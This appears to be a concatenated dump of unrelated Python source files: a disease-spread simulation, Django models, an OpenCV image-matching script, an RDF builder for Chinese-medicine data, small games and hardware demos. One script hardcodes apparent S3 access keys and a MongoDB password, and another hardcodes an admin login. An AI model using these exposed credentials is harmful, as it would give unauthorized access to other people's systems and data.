if a.disease_state[self] not in DISEASE_STATES_INFECTIOUS:#all diseases should be accounted for in every person's disease_state map, so we don't need to check
#a is not infectious
return False
if b.disease_state[self] not in DISEASE_STATES_SUSCEPTIBLE:
#b is not susceptible
return False
symptom_effect = self.symptom_infectivity_modifier if (a.disease_state[self] in DISEASE_STATES_SYMPTOMATIC) else 0.
hand_wash_effect = 0.
effective_activity_type = a.currentActivity.activity_type #doesn't matter if they're not talking TO b
if (a.currentActivity.activity_type == 'talking') or (a.currentActivity.activity_type == 'intimate'):
if a.currentActivity.to == b:
a_washed_hands = int(coinflip(a.hygiene_coef))
b_washed_hands = int(coinflip(b.hygiene_coef))
hand_wash_effect = self.hand_wash_coef*HANDWASH_EFFECT_MODIFIERS[a_washed_hands][b_washed_hands]#the items in HANDWASH_EFFECT_MODIFIERS are all nonpositive, so this can only hurt the disease
else:
effective_activity_type = 'idle'
intimate_effect = 0.
if a.currentActivity.activity_type == 'intimate':
if a.currentActivity.to == b:
intimate_effect = INTIMATE_EFFECT_MODIFIER#this is in general, not specific to the disease
else:
effective_activity_type = 'idle'
#logic for symbiotic and competitive diseases (e.g. having HIV makes it easier for you to get other diseases)d
net_symbio_effect = 0.
for disease in b.disease_state:
if disease != self:
net_symbio_effect += disease.state_infectability_modifiers[b.disease_state[disease]]
infectivity = self.infectivity[effective_activity_type] + symptom_effect + hand_wash_effect + intimate_effect + net_symbio_effect
res = coinflip(infectivity)
if res:
if self.calculate_R_0:
# now update our R_0 measure
if a in self.num_infected_by:
self.num_infected_by[a] += 1
else:
self.num_infected_by.update({a:1})
return True
else:
return False
'''
actually infect this person with this disease
'''
def infect(self,person:ps.Person):
if person.disease_state[self] not in DISEASE_STATES_SUSCEPTIBLE:
return#already done
if person.disease_state[self] in DISEASE_STATES_VACCINATED:
person.disease_state[self] = 'VII'
else:
person.disease_state[self] = 'II'
#this part contains some definitions for a few interesting diseases
#something of an HIV-like STD
STD_0 = Disease('STD_0')
STD_0.infectivity = {'idle':0.,
'sleep':0.,
'traveling':0.,
'talking':0.00000001,
'intimate':0.09}
STD_0.hand_wash_coef = 0.
STD_0.symptom_show_rate = 0.05
STD_0.symptom_infectivity_modifier = 0.05
STD_0.recovery_rate = 0.01
STD_0.die_probability = 0.001 #this doesn't actually kill you
STD_0.state_infectability_modifiers = {'S':0.,
'II':0.1,
'VII':0.1,
'IS':0.15,
'VIS':0.15,
'R':0.05,
'VR':0.05,
'VS':0.,
'VU':0.,
'D':0.,
'VD':0.,
}
STD_0.vaccination_effectiveness = 0.
STD_0.vaccination_rate = 0.#there isn't one
STD_0.symptom_health_effect = 0.05#small effect
STD_0.treatability = 0.#can't be treated
#flu-like (R_0 = 2.25)
virus_0 = Disease('virus 0')
virus_0.infectivity = {'idle':0.0005,
'sleep':0.0001,
'traveling':0.0001,
'talking':0.009,
'intimate':0.06}
virus_0.hand_wash_coef = 0.5
virus_0.symptom_show_rate = 0.3
virus_0.recovery_rate = 0.2
virus_0.die_probability = 0.009
virus_0.vaccination_effectiveness = 0.3
virus_0.vaccination_rate = 0.2
virus_0.symptom_health_effect = 0.2#medium effect
virus_0.treatability = 0.4
virus_0.symptom_infectivity_modifier = 0.05
#measles-like, some numbers from https://en.wikipedia.org/wiki/Measles
virus_1 = Disease('virus 1')
virus_1.infectivity = { 'idle':0.005,
'sleep':0.01,
'traveling':0.005,
'talking':0.1,
'intimate':0.09}
virus_1.hand_wash_coef = 0.2
virus_1.symptom_show_rate = 1./14.
virus_1.recovery_rate = 0.09
virus_1.die_probability = 0.1
virus_1.vaccination_effectiveness = 0.99
virus_1.vaccination_rate = 0.95
virus_1.symptom_health_effect = 0.6#large effect
virus_1.treatability = 0.05
virus_1.symptom_infectivity_modifier = 0.03
#entirely made up, but potentially interesting: competitive disease
competitive_disease_0 = Disease("Competitive 0")
competitive_disease_0.infectivity = {'idle':0.,
'sleep':0.0075,
'traveling':0.,
'talking':0.005,
'intimate':0.035}
competitive_disease_0.hand_wash_coef = 0.7
competitive_disease_0.symptom_show_rate = 0.1
competitive_disease_0.symptom_infectivity_modifier = 0.09
competitive_disease_0.recovery_rate = 0.2
competitive_disease_0.die_probability = 0.001
competitive_disease_0.state_infectability_modifiers = {'S':0.,
'II':-0.2,
'VII':-0.2,
'IS':-0.3,
'VIS':-0.3,
'R':-0.05,
'VR':-0.05,
'VS':0.,
'VU':0.,
'D':0.,
'VD':0.,
}
competitive_disease_0.vaccination_effectiveness = 0.6
competitive_disease_0.vaccination_rate = 0.4
competitive_disease_0.symptom_health_effect = 0.35
competitive_disease_0.treatability = 0.3
#kills easily (R0 = 2.02)
deadly_0 = Disease("Deadly 0")
deadly_0.infectivity = {'idle':0.,
'sleep':0.0075,
'traveling':0.,
'talking':0.05,
'intimate':0.1}
deadly_0.hand_wash_coef = 0.1
deadly_0.symptom_show_rate = 0.1
deadly_0.symptom_infectivity_modifier = 0.09
deadly_0.recovery_rate = 0.02
deadly_0.die_probability = 0.2
deadly_0.state_infectability_modifiers = {'S':0.,
'II':0.1,
'VII':0.1,
'IS':0.15,
'VIS':0.15,
'R':0.05,
'VR':0.05,
'VS':0.,
'VU':0.,
'D':0.,
'VD':0.,
}
deadly_0.vaccination_effectiveness = 0.85
deadly_0.vaccination_rate = 0.1
deadly_0.symptom_health_effect = 0.7
deadly_0.treatability = 0.1
#this is a test disease to make sure the logic all works as expected
t_disease = Disease('test disease')
t_disease.infectivity = {'idle':0.,
'sleep':0.,
'traveling':0.,
'talking':1,
'intimate':1}
t_disease.hand_wash_coef = 0.
t_disease.symptom_show_rate = 0.5
t_disease.recovery_rate = 0.5
t_disease.die_probability = 0.1
t_disease.vaccination_effectiveness = 0.
t_disease.vaccination_rate = 0.5
t_disease.symptom_health_effect = 1#F
t_disease.treatability = 0.#F
all_diseases = [STD_0,virus_0,virus_1,competitive_disease_0,deadly_0] #all diseases yet defined
real_basis_diseases = [STD_0,virus_0,virus_1] #just the ones that have basis in real ones
fast_diseases = [virus_0,virus_1,competitive_disease_0,deadly_0] #just the ones with high recovery/death rates
test_diseases = [t_disease] |
998,375 | 189ffff3544e2e537c978e977b05cbb8ea04f03b | from MeteorClient import MeteorClient
from misc import g_host_address
import ejson
# Disable escaping any ejson types since we use ObjectIds everywhere
# https://www.meteor.com/ejson
ejson.EJSON_KEYWORDS = ()
client = None
callback_function = None
def connect():
global client
if client:
return
client = MeteorClient('ws://%s:3000/websocket' % g_host_address)
client.on('logged_in', logged_in) # will be called after re-connecting too!
client.connect()
def login_callback(error, _=None):
if error:
print error['message']
else:
if __debug__:
print 'Logged in to meteor'
global callback_function
if callback_function:
callback_function()
callback_function = None
def logged_in(data):
login_callback(None, data)
def ddp_call(cb):
# We have to create a call to login even if already logged in because
# the connection would have broken.
global callback_function
callback_function = cb
client.login('admin@infoworks.io', '123456', callback=login_callback)
|
998,376 | b900e100f8823f86986ca1ecf016d6e21bfd9fb7 | from time import time, ctime, localtime
epoch = time()
print()
print("epoch seconds:", epoch)
print()
et = ctime(epoch)
print("Epoch Date and Time:", et)
print()
ct = ctime()
print("Current Date and Time:", ctime())
print()
stobj = localtime()
print("struct_time Object:", stobj)
print()
print("Year:", stobj.tm_year)
print("Month:", stobj.tm_mon)
print("Date:", stobj.tm_mday)
print("Hour:", stobj.tm_hour)
print("Minute:", stobj.tm_min)
print("Second:", stobj.tm_sec)
print()
print(stobj.tm_mday, end="/")
print(stobj.tm_mon, end="/")
print(stobj.tm_year)
print(stobj.tm_hour, end=":")
print(stobj.tm_min, end=":")
print(stobj.tm_sec)
print() |
998,377 | 73406afa0a2d65bed230a77652fa2914fd5bf84d | import os
import pprint
import pymongo
import sys
import boto3
session = boto3.session.Session()
s3 = session.client(endpoint_url='http://s3.momenta.works', aws_access_key_id='ZXIBS6QZ6J4VA0FBDNCS',
aws_secret_access_key='F4iCPNSGGCV7AglUc7s5TsSgns1hjZ9LAOKPoFBr', service_name='s3')
def get_db():
SETTINGS = {
'host': 'mumbai.momenta.works:8025',
'database': 'dora',
'username': 'research',
'password': 'vrl1r0oLbsKht262eybX',
'options': 'ssl=false'
}
try:
conn = pymongo.MongoClient(
"mongodb://{username}:{password}@{host}/{database}?{options}".format(**SETTINGS))
except Exception as ex:
print ("Error:", ex)
exit('Failed to connect, terminating.')
return conn.dora
db = get_db()
# collection = db['human_box_trainset_fisheye_v3']
collection = db['human_box_h3_special_v5']
print "here"
# with open('/home/fangxin/Fisheye/test_annotations/19916_Fisheye_test.md5', 'r') as fp:
# testset_md5 = [l.strip() for l in fp.readlines()]
#
# with open('/home/fangxin/Fisheye/img_320684.md5', 'r') as fp:
# cur_md5 = [l.strip() for l in fp.readlines()]
print "read over"
# Get md5 && Download
cnt = 0
demos = collection.find({},no_cursor_timeout = True).batch_size(1)
fp = open('/home/fangxin/h3_workspace/special_img.md5', 'w')
fp2 = open('/home/fangxin/h3_workspace/special_img.list', 'w')
try:
for item in demos:
if item.get('result') is not None:
if cnt % 100 == 0:
sys.stdout.write('\rcnt={}'.format(cnt))
sys.stdout.flush()
md5_str = item.get('md5')
origin_path = item.get('origin_path')
# if md5_str in testset_md5:
# all_cnt += 1
# continue
# if md5_str in cur_md5:
# all_cnt += 1
# continue
cnt += 1
fp.write(md5_str + '\n')
fp.flush()
fp2.write(origin_path + '\n')
fp2.flush()
except Exception, e:
print e
|
998,378 | d1ded30cad87d3a0c2c1c466afe10284481432fa | import Adafruit_GPIO.PWM as pwmLib
from time import time, sleep
#pwm = pwmLib.get_platform_pwm()
pwm = pwmLib.CHIP_PWM_Adapter()
pwm.start(5, 3, 1)
pwm.start(6, 15, 1)
sleep(3)
pwm.set_duty_cycle(5, 12)
pwm.set_frequency(5, 0.2)
sleep(10)
pwm.stop(5);
pwm.stop(6);
|
998,379 | 8fd970c9213022baed28128b22d5f5580a5eabf7 | import cv2
import numpy as np
from requests.exceptions import HTTPError
import json
import random
import os
txtfile = open("result0.86_negative.txt","a+") #change
txtfile.write("\n" + "FRONT-FAR" +"\n") #change
path1 = r"C:\Users\Supapitch\Desktop\detect_how_similar_images_are\testset\negative\front"
path2 = r"C:\Users\Supapitch\Desktop\detect_how_similar_images_are\testset\negative\far" #change
for num in range(22):
random1 = random.choice([
x for x in os.listdir(path1)
if os.path.isfile(os.path.join(path1, x))
])
random2 = random.choice([
y for y in os.listdir(path2)
if os.path.isfile(os.path.join(path2, y))
])
random_front = random1.strip("\n")
random_other = random2.strip("\n")
stripfront = random1.strip(".jpg")
stripother = random2.strip(".jpg")
frontName = stripfront.split("_")
otherName = stripother.split("_")
# Don't forget to resize images before processing (size < 2000)
original = cv2.imread("testset/negative/front/"+random_front)
image_to_compare = cv2.imread("testset/negative/far/"+random_other) #change
# 1) Check if 2 images are equals
if original.shape == image_to_compare.shape:
print("same size and channels")
difference = cv2.subtract(original, image_to_compare)
b, g, r = cv2.split(difference)
if cv2.countNonZero(b) == 0 and cv2.countNonZero(g) == 0 and cv2.countNonZero(r) == 0:
print("same pixel value")
else:
print("different pixel value")
else:
print("different size and channels")
# 2) Check for similarities between the 2 images
sift = cv2.xfeatures2d.SIFT_create()
kp_1, desc_1 = sift.detectAndCompute(original, None)
kp_2, desc_2 = sift.detectAndCompute(image_to_compare, None)
FLANN_INDEX_KDTREE = 0
index_params = dict(algorithm = FLANN_INDEX_KDTREE, trees = 5)
search_params = dict()
flann = cv2.FlannBasedMatcher(index_params, search_params)
matches = flann.knnMatch(desc_1, desc_2, k=2)
# Need to draw only good matches, so create a mask
matchesMask = [[0,0] for i in range(len(matches))]
# ratio test as per Lowe's paper
good_points = []
for i,(m,n) in enumerate(matches):
if m.distance < 0.86*n.distance: #distance value
matchesMask[i]=[1,0]
good_points.append(m)
# Define how similar they are
number_keypoints = 0
if len(kp_1) <= len(kp_2):
number_keypoints = len(kp_1)
else:
number_keypoints = len(kp_2)
percentSimilar = (len(good_points) / number_keypoints)* 100
txtfile.write("%d. %s - %s: %d / %d / %d / %f \n" % (num+1,frontName[0],otherName[0],len(kp_1),len(kp_2),len(good_points),percentSimilar))
txtfile.close() |
998,380 | 9ca6e1d8143164952e8858b1c6ac856052df8c67 | from django.db import models
# Create your models here.
class Course(models.Model):
code = models.CharField(max_length=10,
blank=False,
help_text='课程代码',
error_messages={
'unique': "A code with that course already exists."}
)
name_en = models.CharField(max_length=100, blank=True)
url = models.URLField()
term = models.IntegerField(null=True)
year = models.IntegerField(null=True)
def __str__(self):
return self.code
class Students(models.Model):
name = models.CharField(max_length=30,
blank=False,
help_text='昵称',
error_messages={
'unique': "A user with that username already exists."}
)
email = models.EmailField(blank=True)
password = models.CharField(max_length=30, blank=False)
register_time = models.DateField(auto_now_add=True)
def __str__(self):
return self.name
|
998,381 | b504e027ee4c10126fd4361c55b7a630c94bfc6e | #!/usr/bin/python3
"""
Constructs the subgraph on the "方剂" (recipe) side.
Composed by Zhand Danyang @THU
Last Revision: Sep 3rd, 2019
"""
import sys
sys.path.insert(0, "../lib")
import rdflib
import json
import rdf_namespace
import utils
import itertools
graph = rdflib.Graph()
with open("../database/方剂/常用中药方剂.json") as f:
database = json.load(f)
database = itertools.chain.from_iterable(db.values() for db in database.values())
database = itertools.chain.from_iterable(database)
common_chinese_drug_recipes = list(database)
# list of dict {方剂名, 组成, 功用(effect+sysmtom)}
with open("../database/病症/中医常见病症.json") as f:
database = json.load(f)["常见病"]
database = ((set(utils.extract_equivalent_expressions(k)), w["子类"]) for k, w in database.items() if "子类" in w)
database = itertools.chain.from_iterable(
((k, w) for w in sub) for k, sub in database)
chinese_medicine_common_symptoms = list(database)
# list of (病症, dict{性质, 对策, 给方})
with open("../database/方剂/中药配方大全.json") as f:
database = json.load(f)
database = itertools.chain.from_iterable(v for k, v in database.items() if k not in ["药物药性疗效表", "祖传秘方"])
chinese_drug_recipe_encyclopaedia = list(database)
# list of {方剂名, 组方, 适应症, 方解, 药物功效}
with open("../database/病症/中华人民共和国中医药行业标准-中医证候诊断标准16.json") as f:
database = json.load(f)
database = itertools.chain.from_iterable(((k, v) for v in l) for k, l in database.items())
prc_chinese_medicine_and_drug_trade_standard_chinese_medicine_symptom_diagnosis_standard_2016 =\
list(database)
# list of (疾病科目, dict{病症, 病机, 诊断依据, 症候分类, 疗效评定})
recipe_keywords, recipe_keyword_mappings = utils.load_rdf_keywords_from_trivial_list("../database/方剂/方剂关键词")
effect_keywords, effect_keyword_mappings = utils.load_rdf_keywords_from_trivial_list("../database/药材/功效关键词")
symptom_keywords, symptom_keyword_mappings = utils.load_rdf_keywords_from_trivial_list("../database/药材/病症_关键词")
pathogenisis_keywords, pathogenisis_keyword_mappings = utils.load_rdf_keywords_from_trivial_list("../database/病症/疾病原理性质关键词")
symptom_keyword_set = set(symptom_keyword_mappings)
# recipe -> effect
for i, entry in enumerate(common_chinese_drug_recipes):
if "方剂名" not in entry:
sys.stderr.write("The {:d}-th entry is without key \"方剂名\"!\n".format(i))
sys.stderr.flush()
continue
if "功用" not in entry:
sys.stderr.write("Entry {:} is without key \"功用\"!\n".format(entry["方剂名"]))
sys.stderr.flush()
continue
#if entry["方剂名"] not in recipe_keyword_mappings:
#sys.stderr.write("\"方剂名\" of entry {:} is not found in keyword file!\n".format(entry["方剂名"]))
#sys.stderr.flush()
#continue
#recipe_id = recipe_keyword_mappings[entry["方剂名"]]
recipe_ids = (kw_id for kw_id, kws in recipe_keywords if any(kw in entry["方剂名"] for kw in kws))
for recipe_id, effect_group in itertools.product(recipe_ids, effect_keywords):
if any(kw in entry["功用"] for kw in effect_group[1]):
graph.add((rdf_namespace.recipe[str(recipe_id)],
rdf_namespace.has_effect,
rdf_namespace.effect[str(effect_group[0])]))
# symptom -> effect
for i, entry in enumerate(chinese_medicine_common_symptoms):
if len(entry[0])==0:
sys.stderr.write("The {:d}-th entry is without a legal key!\n".format(i))
sys.stderr.flush()
continue
if "对策" not in entry[1]:
sys.stderr.write("Entry {:} is without key \"对策\"!\n".format(entry[0]))
sys.stderr.flush()
continue
std_keywords = set(entry[0])&symptom_keyword_set
if len(std_keywords)>0:
effect_group = (kw_id for kw_id, kws in effect_keywords if any(kw in entry[1]["对策"] for kw in kws))
for spt, eft in itertools.product(std_keywords, effect_group):
graph.add((rdf_namespace.symptom[str(symptom_keyword_mappings[spt])],
rdf_namespace.treatment_plan,
rdf_namespace.effect[str(eft)]))
# recipe -> symptom
for i, entry in enumerate(common_chinese_drug_recipes):
if "方剂名" not in entry:
sys.stderr.write("The {:d}-th entry is without key \"方剂名\"!\n".format(i))
sys.stderr.flush()
continue
if "功用" not in entry:
sys.stderr.write("Entry {:} is without key \"功用\"!\n".format(entry["方剂名"]))
sys.stderr.flush()
continue
#if entry["方剂名"] not in recipe_keyword_mappings:
#sys.stderr.write("\"方剂名\" of entry {:} is not found in keyword file!\n".format(entry["方剂名"]))
#sys.stderr.flush()
#continue
#recipe_id = recipe_keyword_mappings[entry["方剂名"]]
recipe_ids = (kw_id for kw_id, kws in recipe_keywords if any(kw in entry["方剂名"] for kw in kws))
for recipe_id, symptom_group in itertools.product(recipe_ids, symptom_keywords):
if any(kw in entry["功用"] for kw in symptom_group[1]):
graph.add((rdf_namespace.recipe[str(recipe_id)],
rdf_namespace.major_in,
rdf_namespace.symptom[str(symptom_group[0])]))
for i, entry in enumerate(chinese_medicine_common_symptoms):
if len(entry[0])==0:
sys.stderr.write("The {:d}-th entry is without a legal key!\n".format(i))
sys.stderr.flush()
continue
if "给方" not in entry[1]:
sys.stderr.write("Entry {:} is without key \"给方\"!\n".format(entry[0]))
sys.stderr.flush()
continue
std_keywords = set(entry[0])&symptom_keyword_set
if len(std_keywords)>0:
recipe_plan = utils.format_recipe_from_str_to_list(entry[1]["给方"])
recipe_plan = (recipe_keyword_mappings[r] for r in recipe_plan if r in recipe_keyword_mappings)
for spt, rcp in itertools.product(std_keywords, recipe_plan):
graph.add((rdf_namespace.recipe[str(rcp)],
rdf_namespace.major_in,
rdf_namespace.symptom[str(symptom_keyword_mappings[spt])]))
for i, entry in enumerate(chinese_drug_recipe_encyclopaedia):
if "方剂名" not in entry:
sys.stderr.write("The {:d}-th entry is without key \"方剂名\"!\n".format(i))
sys.stderr.flush()
continue
if "适应症" not in entry:
sys.stderr.write("Entry {:} is without key \"适应症\"!\n".format(entry["方剂名"]))
sys.stderr.flush()
continue
#if entry["方剂名"] not in recipe_keyword_mappings:
#sys.stderr.write("\"方剂名\" of entry {:} is not found in keyword file!\n".format(entry["方剂名"]))
#sys.stderr.flush()
#continue
#recipe_id = recipe_keyword_mappings[entry["方剂名"]]
recipe_ids = (kw_id for kw_id, kws in recipe_keywords if any(kw in entry["方剂名"] for kw in kws))
for recipe_id, symptom_group in itertools.product(recipe_ids, symptom_keywords):
if any(kw in entry["适应症"] for kw in symptom_group[1]):
graph.add((rdf_namespace.recipe[str(recipe_id)],
rdf_namespace.major_in,
rdf_namespace.symptom[str(symptom_group[0])]))
# symtopm -> pathogenisis
for _, entry in prc_chinese_medicine_and_drug_trade_standard_chinese_medicine_symptom_diagnosis_standard_2016:
if "症候分类" not in entry:
sys.stderr.write("Entry {:} is without key \"症候分类\"!\n".format(entry["病症"]))
sys.stderr.flush()
continue
std_symtom_keywords = (kw_id for kw_id, kws in symptom_keywords if any(kw in entry["病症"] for kw in kws))
std_pathogenisis_keywords = (kw_id for kw_id, kws in pathogenisis_keywords if any(kw in entry["症候分类"] for kw in kws))
for spt, phg in itertools.product(std_symtom_keywords, std_pathogenisis_keywords):
graph.add((rdf_namespace.symptom[str(spt)],
rdf_namespace.originates_from,
rdf_namespace.pathogenisis[str(phg)]))
for i, entry in enumerate(chinese_medicine_common_symptoms):
if len(entry[0])==0:
sys.stderr.write("The {:d}-th entry is without a legal key!\n".format(i))
sys.stderr.flush()
continue
if "性质" not in entry[1]:
sys.stderr.write("Entry {:} is without key \"性质\"!\n".format(entry[0]))
sys.stderr.flush()
continue
std_keywords = set(entry[0])&symptom_keyword_set
if len(std_keywords)>0:
pathogenisis_group = (kw_id for kw_id, kws in pathogenisis_keywords if any(kw in entry[1]["性质"] for kw in kws))
for spt, phg in itertools.product(std_keywords, pathogenisis_group):
graph.add((rdf_namespace.symptom[str(symptom_keyword_mappings[spt])],
rdf_namespace.originates_from,
rdf_namespace.effect[str(phg)]))
# effect -> pathogenesis
for i, entry in enumerate(chinese_medicine_common_symptoms):
key = entry[0] if len(entry[0])>0 else i
if "性质" not in entry[1]:
sys.stderr.write("Entry {:} is without key \"性质\"!\n".format(key))
sys.stderr.flush()
continue
if "对策" not in entry[1]:
sys.stderr.write("Entry {:} is without key \"对策\"!\n".format(key))
sys.stderr.flush()
continue
std_effect_keywords = (kw_id for kw_id, kws in effect_keywords if any(kw in entry[1]["对策"] for kw in kws))
std_pathogenisis_keywords = (kw_id for kw_id, kws in pathogenisis_keywords if any(kw in entry[1]["性质"] for kw in kws))
for eft, phg in itertools.product(std_effect_keywords, std_pathogenisis_keywords):
graph.add((rdf_namespace.symptom[str(eft)],
rdf_namespace.applys_on,
rdf_namespace.effect[str(phg)]))
#graph.serialize(destination="subgraph_wrt_recipe", format="nt")
graph.serialize(destination="subgraph_wrt_recipe", format="xml")
|
998,382 | 4894ce8e3b3639ec52de8939239fbd357565a8a9 | #slippery pizza
#sprites toch check
from livewires import games
import random
games.init(screen_width = 640, screen_height = 480, fps = 50)
class Pan(games.Sprite):
"""The pan which you can move with the mouse"""
def update(self):
"""Set the object in a cursor position"""
self.x = games.mouse.x
self.y = games.mouse.y
self.check_collide()
def check_collide(self):
"""It check collision between pizza and the pan"""
for pizza in self.overlapping_sprites:
pizza.handle_collide()
class Pizza(games.Sprite):
"""Pizza teleport"""
def handle_collide(self):
"""Will teleport sprite in random position"""
self.x = random.randrange(games.screen.width)
self.y = random.randrange(games.screen.height)
def main():
wall_image = games.load_image("images/wall.jpg", transparent = False)
games.screen.background = wall_image
pizza_image = games.load_image("images/pizza.bmp")
pizza_x = random.randrange(games.screen.width)
pizza_y = random.randrange(games.screen.height)
the_pizza = Pizza(image = pizza_image, x = pizza_x, y = pizza_y)
games.screen.add(the_pizza)
pan_image = games.load_image("images/pan.bmp")
the_pan = Pan(image = pan_image,
x = games.mouse.x,
y = games.mouse.y)
games.screen.add(the_pan)
games.mouse.is_visible = False
games.screen.event_grab = True
games.screen.mainloop()
#Let's go!
main() |
998,383 | 0a5d0ecd3bcfe04344cd60ffd2d903caedf3ba16 | #!/usr/bin/python2.7
# -*- encoding: utf8 -*-
"""
Copyright (C) 2012-2015 Rudolf Cardinal (rudolf@pobox.com).
Department of Psychiatry, University of Cambridge.
Funded by the Wellcome Trust.
This file is part of CamCOPS.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import xml.etree.cElementTree as ElementTree
# ... cElementTree is a faster implementation
# ... http://docs.python.org/2/library/xml.etree.elementtree.html
# ... http://effbot.org/zone/celementtree.htm
import pythonlib.rnc_web as ws
from cc_logger import logger
import cc_pls
# =============================================================================
# Localization strings
# =============================================================================
def cache_strings():
"""
Caches strings from the main XML string file.
The string file looks like this:
<?xml version="1.0" encoding="UTF-8"?>
<resources>
<string name="NAME">VALUE</string>
<!-- ... -->
</resources>
"""
if cc_pls.pls.stringDict is not None:
return
if cc_pls.pls.CAMCOPS_STRINGS_FILE_ABSOLUTE is None:
raise AssertionError(
"pls.CAMCOPS_STRINGS_FILE_ABSOLUTE is None -- likely use of "
"LSTRING/WSTRING in classmethod, before initialization via "
"the WSGI application entry point")
logger.debug("Loading XML file: " +
cc_pls.pls.CAMCOPS_STRINGS_FILE_ABSOLUTE)
parser = ElementTree.XMLParser(encoding="UTF-8")
tree = ElementTree.parse(cc_pls.pls.CAMCOPS_STRINGS_FILE_ABSOLUTE,
parser=parser)
cc_pls.pls.stringDict = {}
# find all children of the root with tag "string" and attribute "name"
for e in tree.findall("./string[@name]"):
cc_pls.pls.stringDict[e.attrib.get("name")] = e.text
def LSTRING(stringname): # equivalent of Titanium's L()
"""Looks up a string from the XML string file."""
cache_strings()
return cc_pls.pls.stringDict.get(stringname,
"XML_STRING_NOT_FOUND_" + stringname)
def WSTRING(stringname):
"""Returns a web-safe version of a string from the XML string file."""
return ws.webify(LSTRING(stringname))
def cache_extra_strings():
"""
Caches strings from the all the extra XML string files.
The extra string files look like this:
<?xml version="1.0" encoding="UTF-8"?>
<resources>
<task name="TASK_1">
<string name="NAME_1">VALUE</string>
<string name="NAME_2">VALUE WITH\nNEWLINE</string>
<!-- ... -->
</task>
<!-- ... -->
</resources>
"""
if cc_pls.pls.extraStringDicts is not None:
return
if cc_pls.pls.EXTRA_STRING_FILES is None:
raise AssertionError(
"pls.EXTRA_STRING_FILES is None -- likely use of "
"XSTRING/WXSTRING in classmethod, before initialization via "
"the WSGI application entry point")
cc_pls.pls.extraStringDicts = {}
for filename in cc_pls.pls.EXTRA_STRING_FILES:
logger.debug("Loading XML file: " + filename)
parser = ElementTree.XMLParser(encoding="UTF-8")
tree = ElementTree.parse(filename, parser=parser)
root = tree.getroot()
for taskroot in root.findall("./task[@name]"):
taskname = taskroot.attrib.get("name")
if taskname not in cc_pls.pls.extraStringDicts:
cc_pls.pls.extraStringDicts[taskname] = {}
for e in taskroot.findall("./string[@name]"):
stringname = e.attrib.get("name")
value = e.text
cc_pls.pls.extraStringDicts[taskname][stringname] = value
def XSTRING(taskname, stringname, default=None):
"""Looks up a string from one of the optional extra XML string files."""
if default is None:
default = "EXTRA_STRING_NOT_FOUND({}.{})".format(taskname, stringname)
cache_extra_strings()
if taskname not in cc_pls.pls.extraStringDicts:
return default
return cc_pls.pls.extraStringDicts[taskname].get(stringname, default)
def WXSTRING(taskname, stringname, default=None):
"""Returns a web-safe version of an XSTRING (see above)."""
return ws.webify(XSTRING(taskname, stringname, default))
def get_all_extra_strings():
"""Returns all extra strings, as a list of (task, name, value) tuples."""
cache_extra_strings()
rows = []
for task, subdict in cc_pls.pls.extraStringDicts.iteritems():
for name, value in subdict.iteritems():
rows.append((task, name, value))
return rows
def task_extrastrings_exist(taskname):
"""Has the server been supplied with extra strings for a specific task?"""
cache_extra_strings()
return taskname in cc_pls.pls.extraStringDicts
|
998,384 | 054ef5320dfce49eab918832b698a1b52347521f | from ex111.utilidadescev import moeda, dado
valor = float(input('Digite o valor: '))
moeda.resumo(valor,35,80) |
998,385 | f6893871cf24d6211701eed9d5f274e29b7e0e8c | #####################################################
# Copyright (c) Xuanyi Dong [GitHub D-X-Y], 2019.01 #
#####################################################
from .InferCifarResNet_width import InferWidthCifarResNet
from .InferImagenetResNet import InferImagenetResNet
from .InferCifarResNet_depth import InferDepthCifarResNet
from .InferCifarResNet import InferCifarResNet
from .InferMobileNetV2 import InferMobileNetV2
from .InferTinyCellNet import DynamicShapeTinyNet
|
998,386 | 6aa24979d922a13e71db107ee5cdc509c979c2ba | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2018-09-01 03:54
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('assetsapp', '0005_software'),
]
operations = [
migrations.CreateModel(
name='IDC',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=64, unique=True, verbose_name='机房名称')),
('memo', models.CharField(blank=True, max_length=128, null=True, verbose_name='备注')),
],
options={
'db_table': 't_idc',
'verbose_name': '机房',
'verbose_name_plural': '机房',
},
),
]
|
998,387 | d2b0c69d67922f19cc2c4c5bb52dfb151c3d5045 | # Generated by Django 2.0 on 2020-04-06 17:05
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('main_app', '0038_updates'),
]
operations = [
migrations.CreateModel(
name='chat',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('message', models.CharField(max_length=200)),
('userid', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='main_app.User')),
],
),
]
|
998,388 | 0497bd2b287ecb5754ce5465b20b49a3067e2ee3 | from FunctionBlock.CommPort import *
class BluetoothPort(CommPort):
def __init__(self, address):
CommPort.__init__(self)
self.address = address
def open(self):
pass
def close(self):
pass
def send_data(self, str):
CommPort.send_data(self, str)
def recv_data(self):
return CommPort.recv_data(self) |
998,389 | 3dcc4135157bbb3b4757003b007b321b659c0a9d | from TelaLogin import TelaLogin
class __init__():
def __init__(self):
login = TelaLogin()
app = __init__()
|
998,390 | 047852d46560e16a9044d4d9dafb8f5e99421867 | import os
from .exceptions import ConfigException
def _get_env_variable(key: str) -> str:
value = os.getenv(key)
if value is None:
raise ConfigException()
return value
HOST = _get_env_variable("HOST")
PORT = _get_env_variable("PORT")
KAFKA_BROKER_URL = _get_env_variable('KAFKA_BROKER_URL')
REAL_TRANSACTIONS_TOPIC = _get_env_variable('REAL_TRANSACTIONS_TOPIC')
FAKE_TRANSACTIONS_TOPIC = _get_env_variable('FAKE_TRANSACTIONS_TOPIC') |
998,391 | e670dce001514921d7d55842a500587b77c66d64 | #!/home/popego/envs/ALPHA-POPEGO/bin/python
# EASY-INSTALL-SCRIPT: 'igraph==0.4.5','igraph'
__requires__ = 'igraph==0.4.5'
import pkg_resources
pkg_resources.run_script('igraph==0.4.5', 'igraph')
|
998,392 | a02ad9cfaad11ba86547f4c31ae95493d05be28f | #
# chat nickname --new
# chat nickname --list
# chat nickname --join
#
# announcement:
# needed so others know who should sign the participant list entries.
# anyone can cook up any roomID! and insert participant entries!
